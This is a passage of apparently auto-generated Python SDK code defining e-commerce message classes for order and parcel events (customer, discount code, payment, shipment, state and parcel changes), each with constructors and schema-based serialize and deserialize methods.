last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomerEmailSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerEmailSetMessage":
from ._schemas.message import OrderCustomerEmailSetMessageSchema
return OrderCustomerEmailSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerEmailSetMessageSchema
return OrderCustomerEmailSetMessageSchema().dump(self)
class OrderCustomerGroupSetMessage(Message):
customer_group: typing.Optional["CustomerGroupReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer_group = customer_group
self.old_customer_group = old_customer_group
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomerGroupSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerGroupSetMessage":
from ._schemas.message import OrderCustomerGroupSetMessageSchema
return OrderCustomerGroupSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerGroupSetMessageSchema
return OrderCustomerGroupSetMessageSchema().dump(self)
class OrderCustomerSetMessage(Message):
customer: typing.Optional["CustomerReference"]
customer_group: typing.Optional["CustomerGroupReference"]
old_customer: typing.Optional["CustomerReference"]
old_customer_group: typing.Optional["CustomerGroupReference"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer: typing.Optional["CustomerReference"] = None,
customer_group: typing.Optional["CustomerGroupReference"] = None,
old_customer: typing.Optional["CustomerReference"] = None,
old_customer_group: typing.Optional["CustomerGroupReference"] = None
):
self.customer = customer
self.customer_group = customer_group
self.old_customer = old_customer
self.old_customer_group = old_customer_group
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderCustomerSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderCustomerSetMessage":
from ._schemas.message import OrderCustomerSetMessageSchema
return OrderCustomerSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderCustomerSetMessageSchema
return OrderCustomerSetMessageSchema().dump(self)
class OrderDeletedMessage(Message):
order: "Order"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order: "Order"
):
self.order = order
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDeleted",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderDeletedMessage":
from ._schemas.message import OrderDeletedMessageSchema
return OrderDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDeletedMessageSchema
return OrderDeletedMessageSchema().dump(self)
class OrderDiscountCodeAddedMessage(Message):
discount_code: "DiscountCodeReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
discount_code: "DiscountCodeReference"
):
self.discount_code = discount_code
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDiscountCodeAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeAddedMessage":
from ._schemas.message import OrderDiscountCodeAddedMessageSchema
return OrderDiscountCodeAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeAddedMessageSchema
return OrderDiscountCodeAddedMessageSchema().dump(self)
class OrderDiscountCodeRemovedMessage(Message):
discount_code: "DiscountCodeReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
discount_code: "DiscountCodeReference"
):
self.discount_code = discount_code
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDiscountCodeRemoved",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeRemovedMessage":
from ._schemas.message import OrderDiscountCodeRemovedMessageSchema
return OrderDiscountCodeRemovedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeRemovedMessageSchema
return OrderDiscountCodeRemovedMessageSchema().dump(self)
class OrderDiscountCodeStateSetMessage(Message):
discount_code: "DiscountCodeReference"
state: "DiscountCodeState"
old_state: typing.Optional["DiscountCodeState"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
discount_code: "DiscountCodeReference",
state: "DiscountCodeState",
old_state: typing.Optional["DiscountCodeState"] = None
):
self.discount_code = discount_code
self.state = state
self.old_state = old_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderDiscountCodeStateSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderDiscountCodeStateSetMessage":
from ._schemas.message import OrderDiscountCodeStateSetMessageSchema
return OrderDiscountCodeStateSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderDiscountCodeStateSetMessageSchema
return OrderDiscountCodeStateSetMessageSchema().dump(self)
class OrderEditAppliedMessage(Message):
edit: "OrderEditReference"
result: "OrderEditApplied"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
edit: "OrderEditReference",
result: "OrderEditApplied"
):
self.edit = edit
self.result = result
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderEditApplied",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderEditAppliedMessage":
from ._schemas.message import OrderEditAppliedMessageSchema
return OrderEditAppliedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderEditAppliedMessageSchema
return OrderEditAppliedMessageSchema().dump(self)
class OrderImportedMessage(Message):
order: "Order"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order: "Order"
):
self.order = order
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderImported",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderImportedMessage":
from ._schemas.message import OrderImportedMessageSchema
return OrderImportedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderImportedMessageSchema
return OrderImportedMessageSchema().dump(self)
class OrderLineItemAddedMessage(Message):
line_item: "LineItem"
added_quantity: int
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
line_item: "LineItem",
added_quantity: int
):
self.line_item = line_item
self.added_quantity = added_quantity
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderLineItemAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemAddedMessage":
from ._schemas.message import OrderLineItemAddedMessageSchema
return OrderLineItemAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemAddedMessageSchema
return OrderLineItemAddedMessageSchema().dump(self)
class OrderLineItemDiscountSetMessage(Message):
line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
total_price: "Money"
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
total_price: "Money",
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.line_item_id = line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.total_price = total_price
self.taxed_price = taxed_price
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderLineItemDiscountSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemDiscountSetMessage":
from ._schemas.message import OrderLineItemDiscountSetMessageSchema
return OrderLineItemDiscountSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemDiscountSetMessageSchema
return OrderLineItemDiscountSetMessageSchema().dump(self)
class OrderPaymentStateChangedMessage(Message):
payment_state: "PaymentState"
old_payment_state: typing.Optional["PaymentState"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
payment_state: "PaymentState",
old_payment_state: typing.Optional["PaymentState"] = None
):
self.payment_state = payment_state
self.old_payment_state = old_payment_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderPaymentStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderPaymentStateChangedMessage":
from ._schemas.message import OrderPaymentStateChangedMessageSchema
return OrderPaymentStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderPaymentStateChangedMessageSchema
return OrderPaymentStateChangedMessageSchema().dump(self)
class OrderReturnInfoAddedMessage(Message):
return_info: "ReturnInfo"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
return_info: "ReturnInfo"
):
self.return_info = return_info
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReturnInfoAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnInfoAddedMessage":
from ._schemas.message import OrderReturnInfoAddedMessageSchema
return OrderReturnInfoAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderReturnInfoAddedMessageSchema
return OrderReturnInfoAddedMessageSchema().dump(self)
class OrderReturnShipmentStateChangedMessage(Message):
return_item_id: str
return_shipment_state: "ReturnShipmentState"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
return_item_id: str,
return_shipment_state: "ReturnShipmentState"
):
self.return_item_id = return_item_id
self.return_shipment_state = return_shipment_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderReturnShipmentStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnShipmentStateChangedMessage":
from ._schemas.message import OrderReturnShipmentStateChangedMessageSchema
return OrderReturnShipmentStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderReturnShipmentStateChangedMessageSchema
return OrderReturnShipmentStateChangedMessageSchema().dump(self)
class OrderShipmentStateChangedMessage(Message):
shipment_state: "ShipmentState"
old_shipment_state: typing.Optional["ShipmentState"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
shipment_state: "ShipmentState",
old_shipment_state: typing.Optional["ShipmentState"] = None
):
self.shipment_state = shipment_state
self.old_shipment_state = old_shipment_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShipmentStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShipmentStateChangedMessage":
from ._schemas.message import OrderShipmentStateChangedMessageSchema
return OrderShipmentStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShipmentStateChangedMessageSchema
return OrderShipmentStateChangedMessageSchema().dump(self)
class OrderShippingAddressSetMessage(Message):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShippingAddressSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingAddressSetMessage":
from ._schemas.message import OrderShippingAddressSetMessageSchema
return OrderShippingAddressSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingAddressSetMessageSchema
return OrderShippingAddressSetMessageSchema().dump(self)
class OrderShippingInfoSetMessage(Message):
shipping_info: typing.Optional["ShippingInfo"]
old_shipping_info: typing.Optional["ShippingInfo"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
shipping_info: typing.Optional["ShippingInfo"] = None,
old_shipping_info: typing.Optional["ShippingInfo"] = None
):
self.shipping_info = shipping_info
self.old_shipping_info = old_shipping_info
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShippingInfoSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingInfoSetMessage":
from ._schemas.message import OrderShippingInfoSetMessageSchema
return OrderShippingInfoSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingInfoSetMessageSchema
return OrderShippingInfoSetMessageSchema().dump(self)
class OrderShippingRateInputSetMessage(Message):
shipping_rate_input: typing.Optional["ShippingRateInput"]
old_shipping_rate_input: typing.Optional["ShippingRateInput"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
shipping_rate_input: typing.Optional["ShippingRateInput"] = None,
old_shipping_rate_input: typing.Optional["ShippingRateInput"] = None
):
self.shipping_rate_input = shipping_rate_input
self.old_shipping_rate_input = old_shipping_rate_input
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShippingRateInputSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingRateInputSetMessage":
from ._schemas.message import OrderShippingRateInputSetMessageSchema
return OrderShippingRateInputSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingRateInputSetMessageSchema
return OrderShippingRateInputSetMessageSchema().dump(self)
class OrderStateChangedMessage(Message):
order_state: "OrderState"
old_order_state: "OrderState"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order_state: "OrderState",
old_order_state: "OrderState"
):
self.order_state = order_state
self.old_order_state = old_order_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateChangedMessage":
from ._schemas.message import OrderStateChangedMessageSchema
return OrderStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateChangedMessageSchema
return OrderStateChangedMessageSchema().dump(self)
class OrderStateTransitionMessage(Message):
state: "StateReference"
old_state: typing.Optional["StateReference"]
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
state: "StateReference",
old_state: typing.Optional["StateReference"] = None,
force: bool
):
self.state = state
self.old_state = old_state
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateTransitionMessage":
from ._schemas.message import OrderStateTransitionMessageSchema
return OrderStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateTransitionMessageSchema
return OrderStateTransitionMessageSchema().dump(self)
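# Dispatch sketch (consumer-side assumption, not generated code): handlers
# typically branch on the concrete Message subclass after deserialization,
# for example to treat order state changes and custom state transitions
# differently:
#
#     def handle_order_message(msg: Message) -> None:
#         if isinstance(msg, OrderStateChangedMessage):
#             print(msg.old_order_state, "->", msg.order_state)
#         elif isinstance(msg, OrderStateTransitionMessage):
#             print("transitioned to", msg.state, "forced:", msg.force)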
class OrderStoreSetMessage(Message):
store: "StoreKeyReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
store: "StoreKeyReference"
):
self.store = store
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderStoreSet",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderStoreSetMessage":
from ._schemas.message import OrderStoreSetMessageSchema
return OrderStoreSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStoreSetMessageSchema
return OrderStoreSetMessageSchema().dump(self)
class ParcelAddedToDeliveryMessage(Message):
delivery: "Delivery"
parcel: "Parcel"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery: "Delivery",
parcel: "Parcel"
):
self.delivery = delivery
self.parcel = parcel
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelAddedToDelivery",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelAddedToDeliveryMessage":
from ._schemas.message import ParcelAddedToDeliveryMessageSchema
return ParcelAddedToDeliveryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelAddedToDeliveryMessageSchema
return ParcelAddedToDeliveryMessageSchema().dump(self)
class ParcelItemsUpdatedMessage(Message):
parcel_id: str
delivery_id: typing.Optional[str]
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
parcel_id: str,
delivery_id: typing.Optional[str] = None,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.parcel_id = parcel_id
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelItemsUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelItemsUpdatedMessage":
from ._schemas.message import ParcelItemsUpdatedMessageSchema
return ParcelItemsUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelItemsUpdatedMessageSchema
return ParcelItemsUpdatedMessageSchema().dump(self)
class ParcelMeasurementsUpdatedMessage(Message):
delivery_id: str
parcel_id: str
measurements: typing.Optional["ParcelMeasurements"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
parcel_id: str,
measurements: typing.Optional["ParcelMeasurements"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.measurements = measurements
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelMeasurementsUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelMeasurementsUpdatedMessage":
from ._schemas.message import ParcelMeasurementsUpdatedMessageSchema
return ParcelMeasurementsUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelMeasurementsUpdatedMessageSchema
return ParcelMeasurementsUpdatedMessageSchema().dump(self)
class ParcelRemovedFromDeliveryMessage(Message):
delivery_id: str
parcel: "Parcel"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
parcel: "Parcel"
):
self.delivery_id = delivery_id
self.parcel = parcel
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelRemovedFromDelivery",
)
@classmethod
